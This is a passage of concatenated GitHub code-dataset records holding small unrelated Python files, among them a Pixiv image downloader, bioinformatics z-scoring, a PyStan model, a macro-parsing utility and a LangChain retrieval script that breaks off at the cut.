pixivpy3 import *\nfrom time import sleep\nimport os\nimport setting\n\n\n# Pixiv API へログイン\napi = PixivAPI()\napi.login(setting.pixiv_id, setting.client_password)\naapi = AppPixivAPI()\n\n# 絵師のページIDを入力する\nid_search = int(input('取得したい絵師のページIDを入力してください。>>>'))\n\n# 最大画像取得数\nworks = 300\n\nillustrator_id = api.users_works(id_search, per_page=works)\ntotal_works = illustrator_id.pagination.total\n\n# 最大取得数が絵師の公開する画像の枚数以上の場合\n# 最大画像取得数を合計枚数にセット\nif works < total_works:\n total_works = works\n\nillust = illustrator_id.response[0]\n\n# タグの指定\ntarget_tag = [str(input('取得タグを指定してください。>>>'))]\n\n# 保存先パスの生成\nsaving_direcory_path = './Downloads/' + illust.user.name + '/'\nif not os.path.exists(saving_direcory_path):\n os.mkdir(saving_direcory_path)\nseparator = '------------------------------------------------------------'\n\nprint('Illustrator: {}'.format(illust.user.name))\nprint('Works number: {}'.format(total_works))\nprint(separator)\n\n# ダウンロードスタート\n\n\nfor work_no in range(0, total_works):\n try:\n illust = illustrator_id.response[work_no]\n\n if len(list(set(target_tag) & set(illust.tags))) == 0 and target_tag != []:\n continue\n\n print('Now: {0}/{1}'.format(work_no + 1, total_works))\n print('Title: {}'.format(illust.title))\n\n if os.path.exists(saving_direcory_path+str(illust.id)+'_p0.png') or os.path.exists(saving_direcory_path + str(illust.id) + '_p0.jpg'):\n # すでにダウンロード済みの場合スキップ\n print('Title:'+str(illust.title)+' has already downloaded.')\n print(separator)\n sleep(1)\n continue\n\n if illust.is_manga:\n work_info = api.works(illust.id)\n for page_no in range(0, work_info.response[0].page_count):\n page_info = work_info.response[0].metadata.pages[page_no]\n aapi.download(page_info.image_urls.large, saving_direcory_path)\n sleep(3)\n\n else:\n aapi.download(illust.image_urls.large, saving_direcory_path)\n sleep(3)\n\n except Exception:\n continue\n\n print(separator)\n\nprint('Download complete! Thanks to {}!!'.format(illust.user.name))\n","repo_name":"kento-python-lab/pixiv-dl","sub_path":"pixiv_image_downloader.py","file_name":"pixiv_image_downloader.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2128973991","text":"from scipy.stats import zscore\nimport numpy as np\n\n# method to get expression data of all samples\ndef get_expression_data(data, sample_list,genes_by_signature, signatures_by_gene):\n\n data_columns = []\n\n # get column index of each sample\n header_split = data[0].rstrip().split(\"\\t\")\n for sample in sample_list:\n column_index = 0\n for header in header_split:\n if sample == header:\n data_columns.append(column_index)\n column_index += 1\n\n\n # get expression data for each gene and add to the appropriate signature\n header = True\n for line in data:\n if header:\n header = False\n else:\n\n # gets the expression data\n line_split = line.rstrip().split(\"\\t\")\n gene = line_split[0] + \"\\t\" + line_split[1]\n expression_data = []\n for column in data_columns:\n expression_data.append(line_split[column])\n\n # converts to a z-score\n zscore_data = np.array(expression_data).astype(np.float)\n z_transformed = zscore(zscore_data)\n\n # checks that the z-score is not nan\n if str(z_transformed[0]) == \"nan\":\n z_transformed = [0.0] * len(sample_list)\n\n # updates the signature\n signature = signatures_by_gene[gene]\n gene_information = genes_by_signature[signature][gene]\n gene_information[\"expression_data\"] = expression_data\n gene_information[\"zscore_data\"] = z_transformed\n genes_by_signature[signature][gene] = gene_information\n\n return genes_by_signature\n","repo_name":"Searchlight2/Searchlight2","sub_path":"software/statistical_analysis_tools/differential_expression_signature/get_expression_data.py","file_name":"get_expression_data.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"27078263918","text":"a=5\nb=16\narr1=[2,4,6,-8]\narr2=[42,8,15,23,42]\n\ndef insertShiftArray(arr,a):\n if not( type(arr) == type([]) ):\n return 'error'\n newArr=[]\n if len(arr)%2==0:\n t=int(len(arr)/2)\n else:\n t=int(len(arr)/2)+1\n newArr = arr[0:t]+[a]\n newArr = newArr+arr[t:len(arr)]\n\n return newArr\n \n\nprint(insertShiftArray(arr2,b))\n","repo_name":"AhmedZatar/data-structures-and-algorithms-401","sub_path":"Challenges/array_shift/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6549649966","text":"from turtle import Turtle, done\n\nt=Turtle()\nt.left(180)\n\nside = 100\nangle = 60\nt.color(\"red\", \"yellow\")\nt.begin_fill()\nfor i in range(6):\n t.forward(100)\n t.right(angle)\n \nt.end_fill()\ndone()","repo_name":"Mayon-Francis/S6_Python_Elective","sub_path":"Assignment7/3_hexagon.py","file_name":"3_hexagon.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5924020534","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 17 16:04:34 2017\r\n\r\nCreated on Thu Mar 16 11:46:17 2017\r\nread and plot CD error vs. Zernike per cutline\r\nvai DataFrame\r\n\r\n@author: vincchen\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npath = r'./'\r\nfile_name = 'PC-SMO_data.xlsx'\r\n\r\ndata = pd.read_excel(path + file_name)\r\ndata = data.drop(['del'], axis=1)\r\n\r\ndata['CD error'] = data['IPE1'] + data['IPE2']\r\ndata['absolute CD error'] = np.abs(data['CD error'] )\r\n\r\ndata_rows, data_columns = data.shape[0], data.shape[1]\r\n# -10600/-8480/-6360/-4240/-2120/0/2120/4240/6360/8480/10600\r\n# delta_slit = 2.12\r\nn_slit = 11\r\nn_cutline = 33 # data_rows/n_slit\r\n\r\ncutline_group = []\r\nfor i in np.arange(n_cutline):\r\n cutline_group.append(data['Cutline'][i*n_slit+1])\r\n\r\nmax_CDerror_thruslit = []\r\nfor i in np.arange(n_cutline):\r\n max_CDerror_thruslit.append(np.max(data['absolute CD error'][i * n_slit : (i+1) * n_slit]))\r\n\r\nH_index = [0, 2, 4, 6, 16, 18, 20, 22]\r\nV_index = [1, 3, 5, 7, 17, 19, 21, 23]\r\nH_CDerror = []\r\nV_CDerror = []\r\nfor i in H_index:\r\n H_CDerror.append(max_CDerror_thruslit[i])\r\nfor i in V_index:\r\n V_CDerror.append(max_CDerror_thruslit[i])\r\n\r\nfig = plt.figure(figsize=(14, 6))\r\nx_label = ['-1', '0', '1', '2', '7', '8', '9', '10']\r\ny_max = np.max([np.max(H_CDerror), np.max(V_CDerror)])\r\n# horizontal plot\r\nax_1 = plt.subplot(1,2,1)\r\nax_1.bar(np.arange(len(H_CDerror)), H_CDerror, fc='black', tick_label = x_label, align='center')\r\nplt.ylim((0, (y_max*11).round()/10))\r\nplt.xlabel('Critical Pattern', fontsize=15)\r\nplt.ylabel('absolute Max CD error(nm)', fontsize=15)\r\nplt.title('absolute value of thru-slit Max CD error(Horizontal)')\r\n# vertical plot\r\nax_2 = plt.subplot(1,2,2)\r\nax_2.bar(np.arange(len(V_CDerror)), V_CDerror, fc='black', tick_label = x_label, align='center')\r\nplt.ylim((0, (y_max*11).round()/10))\r\nplt.xlabel('Critical Pattern', fontsize=15)\r\nplt.ylabel('absolute Max CD error(nm)', fontsize=15)\r\nplt.title('absolute value of thru-slit Max CD error(Vertical)')\r\n","repo_name":"jchenpanyu/Python_SMO","sub_path":"thru-slit @N.C. plot/CDerror-vs-thru-slit_@NC_plot[one-data-set].py","file_name":"CDerror-vs-thru-slit_@NC_plot[one-data-set].py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6923170090","text":"import os\nimport sys\nfrom collections import Counter\n\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(PROJECT_PATH)\n\nfrom measurement import Stopwatch\n\n\nclass Solution(Stopwatch):\n def __init__(self):\n super().__init__()\n\n def execute(self):\n answer = None\n\n exponent = 0\n\n while answer is None:\n start = 10 ** exponent\n end = start * 10 // 6\n\n for num in range(start, end+1):\n has_same_digits = True\n digit_set = Counter(str(num))\n\n for coefficient in range(2, 7):\n another_digit_set = Counter(str(num * coefficient))\n\n if digit_set != another_digit_set:\n has_same_digits = False\n break\n\n if has_same_digits:\n answer = num\n break\n\n exponent += 1\n\n return answer\n\nif __name__ == '__main__':\n soln = Solution()\n result = soln.execute()\n print(result)\n","repo_name":"ony3000/project-euler","sub_path":"problems_051to075/problem_052/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4413892363","text":"#!/usr/bin/env python\nfrom jinja2 import FileSystemLoader, StrictUnderfined\nfrom jinja2.environment import Environment\n\nenv = Environment(undefined=StrictUdefined)\nenv.loader = FileSystemLoader('.')\n\nintf_vars = {\n 'ip_addr': '10.220.88.20',\n 'netmask' : '255.255.255.0',\n}\n\ntemplate_file = 'intf_config333.j2'\ntemplate = env.get_template(template_file)\noutput = template.render(**intf_vars)\nprint(output)\n\n","repo_name":"mikealford/ktbyers_automation","sub_path":"week6/jinja2_test3.py","file_name":"jinja2_test3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6075120693","text":"import csv\nfrom ast import literal_eval\nimport numpy as np\nimport pandas as pd\nfrom scipy.sparse import lil_matrix\n\n\nclass TwitterDataProcessing:\n def read_count_tfidf_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int}, converters={\"tweet\": literal_eval})\n labels = np.array(list(data[\"sentiment\"]))\n tweet_ids = np.array(list(data[\"tweet_id\"]))\n tweets = list(data[\"tweet\"])\n\n tweets_sparse_matrix = lil_matrix((len(tweets), 5000))\n\n for i in range(len(tweets)):\n tweet = tweets[i]\n for j in range(len(tweet)):\n word = tweet[j]\n tweets_sparse_matrix[i, word[0]] = word[1]\n\n return labels, tweet_ids, tweets_sparse_matrix\n\n def read_glove_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int}, converters={\"tweet\": literal_eval})\n labels = list(data[\"sentiment\"])\n tweet_ids = list(data[\"tweet_id\"])\n tweets = list(data[\"tweet\"])\n return labels, tweet_ids, tweets\n\n def read_raw_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int, \"tweet\": str})\n labels = np.array(list(data[\"sentiment\"]))\n tweet_ids = np.array(list(data[\"tweet_id\"]))\n tweets = np.array(list(data[\"tweet\"]))\n return labels, tweet_ids, tweets\n\n def write_predictions(self, tweet_ids, predictions, file_path):\n print(\"Writing \" + file_path + \"...\")\n pred_file = open(file_path, \"w\")\n writer = csv.writer(pred_file)\n writer.writerow([\"tweet_id\", \"sentiment\"])\n for i in range(len(tweet_ids)):\n writer.writerow([tweet_ids[i], predictions[i]])\n pred_file.close()\n print(\"Finish writing \" + str(i + 1) + \" testing\")","repo_name":"xueqig/machine-learning-a3","sub_path":"dataProcessing.py","file_name":"dataProcessing.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14651539919","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pystan\nimport numpy as np\nimport pandas as pd\n\n\nData = pd.read_csv('trend2.csv')\n\n\n# In[2]:\n\n\nData = Data.dropna()\nData = Data.reset_index(drop = True)\nData.tail(10)\n\n\n# In[3]:\n\n\n# enumerate countries\ncountries = Data.country.str.strip()\nunique_countries = countries.unique()\nnum_countries = len(unique_countries)\ncountries_dict = dict(zip(unique_countries, range(num_countries)))\ncountries = countries.replace(countries_dict).values\nN = len(countries);\nJ = num_countries\n\n\n# In[7]:\n\n\nModel = \"\"\"\ndata {\n int J;\n int N;\n int K;\n int country[N];\n matrix[N,K] X;\n vector[N] y;\n}\n\nparameters {\n vector[J] a;\n vector[K] B;\n real mu_a;\n real sigma_a;\n real sigma_y;\n}\n\ntransformed parameters {\n vector[N] y_hat;\n for(i in 1:N)\n y_hat[i] = a[country[i]] + X[i] * B;\n}\n\nmodel {\n sigma_a ~ normal(0,10);\n sigma_y ~ normal(0,10);\n B ~ normal(0,10);\n a ~ normal(mu_a,sigma_a);\n y ~ normal(y_hat,sigma_y);\n}\n\"\"\"\n\nmodel_data = {'N':N,\n 'J':J,\n 'K':2,\n 'country':countries + 1,\n 'X': Data[['gini_net','rgdpl']],\n 'y': Data['church2']}\n\nmodel_fit = pystan.stan(model_code = Model, data = model_data, iter = 1000, chains = 2, n_jobs = 2)\n\nprint(model_fit)\n\n\n# In[21]:\n\n\nimport matplotlib.pyplot as plt\na_sample = pd.DataFrame(model_fit['a'])\n\nimport seaborn as sns\nsns.set(style=\"ticks\", palette=\"muted\", color_codes=True)\n\n# Plot the orbital period with horizontal boxes\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=a_sample, whis=np.inf, color=\"c\")\n\nmodel_fit.plot(pars=['sigma_a', 'B']);\n\n\n# In[22]:\n\n\nxvals = np.arange(2)\nbp = model_fit['a'].mean(axis=0)\nmp = model_fit['B'].mean()\nfor bi in bp:\n plt.plot(xvals, mp*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1,1.1);\n\n\n# In[26]:\n\n\nModel2 = \"\"\"\ndata {\n int J;\n int N;\n int K;\n int country[N];\n matrix[N,K] X;\n vector[N] y;\n}\n\nparameters {\n vector[J] a;\n vector[K] B;\n real mu_a;\n real sigma_a;\n real sigma_y;\n}\n\ntransformed parameters {\n vector[N] y_hat;\n for(i in 1:N)\n y_hat[i] = a[country[i]] + X[i] * B;\n}\n\nmodel {\n sigma_a ~ normal(0,10);\n sigma_y ~ normal(0,10);\n B[1] ~ normal(15,15);\n B[2] ~ normal(0,10);\n a ~ normal(mu_a,sigma_a);\n y ~ normal(y_hat,sigma_y);\n}\n\"\"\"\n\nmodel_data2 = {'N':N,\n 'J':J,\n 'K':2,\n 'country':countries + 1,\n 'X': Data[['gini_net','rgdpl']],\n 'y': Data['church2']}\n\nmodel_fit2 = pystan.stan(model_code = Model, data = model_data2, iter = 1000, chains = 4, n_jobs = 2)\n\nprint(model_fit2)\n\n\n# In[51]:\n\n\n# After changing the prior on the explanatory variable estimate there was not a substantial effect on the posterior\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NazirNayal8/PythonCourse","sub_path":"HW3/HW3_sub.py","file_name":"HW3_sub.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22875604464","text":"import time, re\nfrom typing import Callable, List, Dict, Union\n\nfrom constants import FIRST_LINE_OF_MULTILINE_MACRO_DEF_RE, NON_WORD_CHAR, SINGLELINE_MACRO_DEF_RE\nfrom Chunk import *\n\nbrackets_open_to_closed = {'(':')', '[':']', '{':'}'}\nbracket_names = {'(':'parenthesis', '[':'square bracket', '{':'curly bracket'}\n\n\n\ndef perfcounter():\n return time.clock()\n # pydocs say this is preferred if you're using python 3.x:\n # return time.perfcounter()\n\n\ndef couldBeToken(start:int, stop:int, text:str) -> bool:\n \"\"\"\n Pre: 0 <= start <= stop <= len(text) - 1\n Return true iff\n start == 0 or text[start-1] is a non-word character, and\n stop == len(text)-1 or text[stop+1] is a non-word character\n\n This should be equivalent to some search using re.search(\"\\b\\w+\\b\" ...\n \"\"\"\n if start == 0 or re.search(NON_WORD_CHAR, text[start-1]):\n return stop == len(text) - 1 or re.search(NON_WORD_CHAR, text[stop+1])\n else:\n return False\n\n\ndef updateInStrLit(in_str_lit:Dict[str,bool], i:int, text:str) -> None:\n \"\"\"\n :param in_str_lit: dict {\"'\":boolean, '\"':boolean, '`':boolean} that is all false if i == 0, and otherwise\n tells whether text[i-1] is within a string literal of the corresponding type.\n :param i:\n :param text:\n :return:\n \"\"\"\n a = text[i]\n\n if a == \"'\":\n # if the ' isn't escaped AND we're not inside a \" or ` quoted string.\n if text[min(i - 1, 0)] != \"\\\\\" and not in_str_lit['\"'] and not in_str_lit[\"`\"]:\n in_str_lit[\"'\"] = not in_str_lit[\"'\"]\n elif a == '\"':\n # if the \" isn't escaped AND we're not inside a ' or ` quoted string.\n if text[min(i - 1, 0)] != \"\\\\\" and not in_str_lit[\"'\"] and not in_str_lit[\"`\"]:\n in_str_lit['\"'] = not in_str_lit['\"']\n elif a == '`':\n # if the ` isn't escaped AND we're not inside a ' or \" quoted string.\n if text[min(i - 1, 0)] != \"\\\\\" and not in_str_lit[\"'\"] and not in_str_lit['\"']:\n in_str_lit['`'] = not in_str_lit['`']\n\ndef inStrLiteral(in_str_lit:Dict[str,bool]) -> bool:\n return in_str_lit['\"'] or in_str_lit[\"'\"] or in_str_lit[\"`\"]\n\ndef updateOpenBracketCnts(open_bracket_cnt:Dict[str,int], i:int, text:str) -> None:\n \"\"\"\n PRE: text[i] is not within a string literal\n :param open_bracket_cnt:\n :param i:\n :param text:\n \"\"\"\n a = text[i]\n if a == \"(\":\n open_bracket_cnt[\"(\"] += 1\n elif a == \"{\":\n open_bracket_cnt[\"{\"] += 1\n elif a == \"[\":\n open_bracket_cnt[\"[\"] += 1\n elif a == \")\":\n open_bracket_cnt[\"(\"] -= 1\n elif a == \"}\":\n open_bracket_cnt[\"{\"] -= 1\n elif a == \"]\":\n open_bracket_cnt[\"[\"] -= 1\n\ndef bracketsBalanced(open_bracket_cnt:Dict[str,int]) -> bool:\n return open_bracket_cnt[\"(\"] == open_bracket_cnt[\"{\"] == open_bracket_cnt[\"[\"] == 0\n\ndef unmatchedCloseBracket(open_bracket_cnt:Dict[str,int]) -> bool:\n return open_bracket_cnt[\"(\"] < 0 or open_bracket_cnt[\"{\"] < 0 or open_bracket_cnt[\"[\"] < 0\n\ndef escapeQuotes(x):\n # TODO: this is probably not a fully general solution\n return x.replace(\"'\",\"\\\\'\").replace('\"','\\\\\"').replace(\"`\",\"\\\\`\")\n\n\ndef find_next_toplevel_in_str(s:str, start:int, char_to_find:str) -> int:\n chunk = OpenChunk([s], 0, start)\n res = find_next_toplevel(chunk, char_to_find)\n if not res:\n return res\n return res.stop_line_stop_ind\n\n\ndef find_next_toplevel(chunk:Chunk, char_to_find:str) -> Union[ClosedChunk,None]:\n \"\"\"\n @:param chunk : Chunk\n @:param char_to_find : character\n @returns None if none found, or else a ClosedChunk with\n lines = chunk.lines\n start_line_num = chunk.start_line_num\n start_line_ind = chunk.start_line_ind\n stop_line_num = first line in chunk containing a top-level char_to_find\n stop_line_stop_ind = index in stop_line_num of the top-level char_to_find\n\n >>> aline = ['functioncall(0,1,2)\\n']\n >>> find_next_toplevel(OpenChunk(aline, 0, 13), ')')\n Chunk(['functioncall(0,1,2)\\n'],0,13,0,18)\n >>> [find_next_toplevel(OpenChunk(aline, 0, 12), ')')]\n [None]\n\n >>> lines = ['line 1\\n', '\\n', 'line 2(\\n', 'a, b, \\n', 'c\\n', ')\\n', 'a\\n']\n >>> find_next_toplevel(OpenChunk(lines, 0, 0), 'a')\n Chunk(['line 1\\n', '\\n', 'line 2(\\n', 'a, b, \\n', 'c\\n', ')\\n', 'a\\n'],0,0,6,0)\n >>> lines2 = [ '\"Problem with prop \" + p + \", allowed_flatprops(p) is \" + allowed_flatprops[p] + \", nodetype is \" + node.nodetype']\n >>> find_next_toplevel(OpenChunk(lines2, 0, 0), ',')\n \"\"\"\n rv = Chunk(chunk.lines, chunk.start_line_num, chunk.start_line_start_ind, None, None)\n\n line_ind = chunk.start_line_start_ind\n\n # Number of open Round, Square, and Curly brackets, respectively, in the part of lines scanned so far\n # i.e. up to lines[line_num][line_ind]\n # exception if any are ever negative.\n bracket_cnts = {'(':0, '[':0, '{':0}\n\n # Whether lines[line_num][line_ind] is inside a Single/Double/Back quoted string\n in_str_lit = {\"'\":False, '\"':False, '`':False}\n\n found = False\n line_num = chunk.start_line_num\n\n stop_line_num = chunk.stop_line_num if (chunk.stop_line_num is not None) else len(chunk.lines) - 1\n\n assert stop_line_num <= len(chunk.lines) - 1, repr(chunk)\n while not found and line_num <= stop_line_num:\n\n line = chunk.lines[line_num]\n\n if chunk.stop_line_stop_ind is not None and line_num == chunk.stop_line_num:\n stop_line_ind = chunk.stop_line_stop_ind\n else:\n stop_line_ind = len(line) - 1\n\n while True:\n a = line[line_ind]\n\n if not inStrLiteral(in_str_lit):\n\n if a == \"/\" and line_ind < len(line) - 1 and line[line_ind + 1] == \"/\":\n # this is a comment line. ignore it\n break\n\n # possibly the character occurrence we're looking for, if the context is right.\n if a == char_to_find:\n # check if brackets are balanced and we're not inside a string literal, in which case we're done.\n if bracketsBalanced(bracket_cnts) and not inStrLiteral(in_str_lit):\n # next two lines cause both loops to exit\n found = True\n break\n\n updateOpenBracketCnts(bracket_cnts, line_ind, line)\n\n updateInStrLit(in_str_lit, line_ind, line)\n\n\n if unmatchedCloseBracket(bracket_cnts):\n msg = \"[MM] There seems to be an unmatched close-paren/bracket in line {}[1-based], found while looking for the next '{}'.\\n\".format(\n line_num + 1, char_to_find)\n\n for b in bracket_cnts.keys():\n if bracket_cnts[b] < 0: msg += \"Unmatched closed \" + bracket_names[b] + \"\\n\"\n\n for b in bracket_cnts.keys():\n msg += \"Also, we'd counted {} open {} brackets when this exception happened.\\n\".format(bracket_cnts[b], b)\n\n raise Exception(msg)\n\n if line_ind == stop_line_ind:\n break\n line_ind += 1\n\n if found or line_num == stop_line_num:\n break\n\n line_num += 1\n line_ind = 0\n\n # next checks aren't necessary if macros file has been parsed by tsc:\n if not bracketsBalanced(bracket_cnts) or inStrLiteral(in_str_lit):\n print(repr(chunk))\n msg = \"[MM] Unclosed paren/bracket or quote at line {} (1-based)?\\n\".format(line_num + 1)\n for b in bracket_cnts.keys():\n if bracket_cnts[b] < 0: msg += \"Unclosed \" + bracket_names[b] + \"\\n\"\n for q in in_str_lit.keys():\n if in_str_lit[q] < 0: msg += \"Unclosed \" + q + \"\\n\"\n raise Exception(msg)\n\n if not found:\n return None\n\n rv.stop_line_num = line_num\n rv.stop_line_stop_ind = line_ind\n\n return rv\n\n\n\n\ndef split_by_top_level_commas(bigger_chunk:ClosedChunk) -> List[ClosedChunk]:\n \"\"\"\n Takes a CLOSED chunk @bigger_chunk of a valid function call in some source text,\n NO -> optionally beginning and ending with the opening '(' and closing ')'\n Returns a list of closed chunks for the individual arguments, each of which may span multiple lines.\n \"\"\"\n r\"\"\"\n >>> lines = [\"debugtest(this.node_class_names.forEach(function (nodetype) {\\n\", \"\tdassert(_this.strict_subtype_reln.has(nodetype), nodetype);\\n\", \"\tdassert(_this.strict_supertype_reln.has(nodetype), nodetype);\\n\", \"}));\"]\n >>> chunk = Chunk(lines, 0, 10, 3, 1)\n >>> rv = split_by_top_level_commas(chunk)\n >>> map( lambda x: x.numbersTuple(), rv)\n [(0, 10, 3, 1)]\n >>> lines2 = [\"fn(10 , 20,\\n\", \"30,\\n\", \"40,50\\n\", \" )\\n\"]\n >>> chunk2 = Chunk(lines2, 0, 3, 3, 2)\n >>> rv2 = split_by_top_level_commas(chunk2)\n >>> map( lambda x: x.numbersTuple(), rv2)\n [(0, 3, 0, 5), (0, 7, 0, 9), (0, 11, 1, 1), (1, 3, 2, 1), (2, 3, 3, 2)]\n >>> lines3 = [\"debugtest(this.node_class_names.forEach(function (nodetype) {\\n\",\" dassert(_this.strict_subtype_reln.has(nodetype), nodetype);\\n\",\" dassert(_this.strict_supertype_reln.has(nodetype), nodetype);\\n\",\" }));\\n\"]\n >>> par3 = Chunk(lines3, 0, 10, 3, 13)\n >>> rv3 = split_by_top_level_commas(par3)\n >>> map( lambda x: x.numbersTuple(), rv3)\n [(0, 10, 3, 13)]\n >>> line = ['dassert(allowed_flatprops[p] === StringPropType.immutstring || allowed_flatprops[p] === StringPropType.stringselect, \"Problem with prop \" + p + \", allowed_flatprops(p) is \" + allowed_flatprops[p] + \", nodetype is \" + node.nodetype);' ]\n >>> par4 = Chunk(line, 0, 9, 0, 212)\n >>> rv4 = split_by_top_level_commas(par4)\n >>> map( lambda x: x.numbersTuple(), rv4)\n 3\n \"\"\"\n\n # idea: use find_next_toplevel repeatedly until end of chunk\n arg_chunks = []\n remaining_args_chunk = Chunk(\n bigger_chunk.lines,\n bigger_chunk.start_line_num,\n bigger_chunk.start_line_start_ind,\n bigger_chunk.stop_line_num,\n bigger_chunk.stop_line_stop_ind\n )\n\n while True:\n next_arg_chunk = find_next_toplevel(remaining_args_chunk, \",\")\n if next_arg_chunk is not None:\n # for next iteration of loop:\n remaining_args_chunk.start_line_num = next_arg_chunk.stop_line_num\n remaining_args_chunk.start_line_start_ind = next_arg_chunk.stop_line_stop_ind + 1 # start just after the ','\n next_arg_chunk.delete_last_char() # adjust to not include the ','\n arg_chunks.append(next_arg_chunk)\n else:\n # then we're done, which means the final arg is just remaining_args_chunk\n arg_chunks.append(remaining_args_chunk)\n break\n return arg_chunks\n\n\n\ndef for_each_macro_def(macro_defs_file_path:str, f:Callable[[str,str,str],None]):\n \"\"\"\n f is a function that takes a tripple (fnname: string, params_str: string, body_as_single_line: string) and returns nothing.\n It will be called on each such tripple parsed from the file at path macro_defs_file_path.\n \"\"\"\n macro_defs_file = open(macro_defs_file_path, 'r')\n macro_defs_file_lines = macro_defs_file.readlines()\n macro_defs_file.close()\n\n i = 0\n file_ind = 0\n while i < len(macro_defs_file_lines):\n line = macro_defs_file_lines[i]\n if line.startswith(\"//STOP\"):\n print(\"[MM] Found '//STOP' in macro defs file\")\n return\n # match = SINGLELINE_NONVOID_MACRO_DEF_RE.match(line)\n # if match:\n # \tfnname, params_str, body = match.groups()\n # \ti += 1\n # \tf(fnname, params_str, body)\n # \tcontinue\n if (line.startswith(\"import\") or line.startswith(\"const\") or line.startswith(\"window\") or \n line.startswith(\"declare\") or line.startswith(\"type\") ):\n i += 1\n continue\n\n match = SINGLELINE_MACRO_DEF_RE.match(line)\n if match:\n fnname, params_str, body = match.groups()\n i += 1\n f(fnname, params_str, body)\n continue\n\n match = FIRST_LINE_OF_MULTILINE_MACRO_DEF_RE.match(line)\n if match:\n fnname, params_str, opt_returntype = match.groups()\n\n body_chunk = find_next_toplevel(OpenChunk(macro_defs_file_lines, i + 1, 0), \"}\")\n\n # remove any single-line comments, and exclude the line containing the final }\n body_lines = filter(lambda x: not x.strip().startswith(\"//\"),\n body_chunk.lines[body_chunk.start_line_num:body_chunk.stop_line_num])\n\n # remove the endlines and extra whitespace, then join as single string\n body_str = \"\".join(map(lambda s: s.strip(), body_lines))\n\n if opt_returntype:\n assert( body_str.startswith(\"return \") ) \n body_str = body_str[7:]\n if body_str[-1] == \";\":\n body_str = body_str[:-1]\n\n print(\"\\nFOUND NON-VOID NON-IDENTITY MACRO. body_str is\\n\" + body_str + \"\\n\")\n\n i = body_chunk.stop_line_num + 1 \n\n \n f(fnname, params_str, body_str)\n continue \n\n else:\n stripped = line.strip()\n assert stripped == \"\" or stripped.startswith(\"//\"), \"\\nThe line \\n\\t\" + line + \\\n \"is not recognized as an empty line, a single-line comment, or as part of a macro definition.\\n\" + \\\n \"Nothing else is allowed (including /* */ comments).\\n\" + \\\n \"Note that the '{' following the parameters of a macro definition must be on the same line as \\\"function\\\".\"\n i += 1\n continue\n\n\ndef readfile_as_lines(path:str):\n f = open(path, \"r\")\n lines = f.readlines() \n f.close()\n return lines\n\ndef readfile_as_string(path:str): \n f = open(path, \"r\")\n filestr = f.read()\n f.close()\n return filestr\n\ndef find_spot_for_console_msg(lines: List[str]) -> int:\n \"\"\"\n Look backwards through lines to find index k of the file's last line that doesn't start with //\n This is an attempt to not interfere with other tools that place a \"hot comment\" at the end of the file.\n \"\"\"\n i = len(lines) - 1\n\n while i >= 0:\n if lines[i].startswith(\"//\"):\n i -= 1\n else:\n return i\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"DustinWehr/minimal-macros","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9064062998","text":"from langchain.document_loaders import DirectoryLoader\nfrom langchain.embeddings.huggingface import HuggingFaceEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores.chroma import Chroma\nimport os\n\nembeddings = HuggingFaceEmbeddings(model_name=\"GanymedeNil/text2vec-large-chinese\",\n model_kwargs={'device': \"cuda:0\"})\n\ndef load_documents(directory = \"/root/DISC-LawLLM/法律文书\"):\n print(\"loading documents……\")\n raw_documents = DirectoryLoader(directory).load()\n text_splitter = CharacterTextSplitter(chunk_size = 256, chunk_overlap = 0)\n docs = text_splitter.split_documents(raw_documents)\n return docs\n\ndef store_chroma(docs, embeddings, persist_dirctory=\"VectorDataBase\"):\n print(\"storing vectors……\")\n db = Chroma.from_documents(docs, embeddings, persist_directory=persist_dirctory)\n db.persist\n return db\n\n\ndef quest(query):\n embedding_vector = embeddings.embed_query(query)\n if not os.path.exists(\"/root/DISC-LawLLM/VectorDataBase\"):\n documents = load_documents()\n db = store_chroma(documents, embeddings)\n else:\n db = 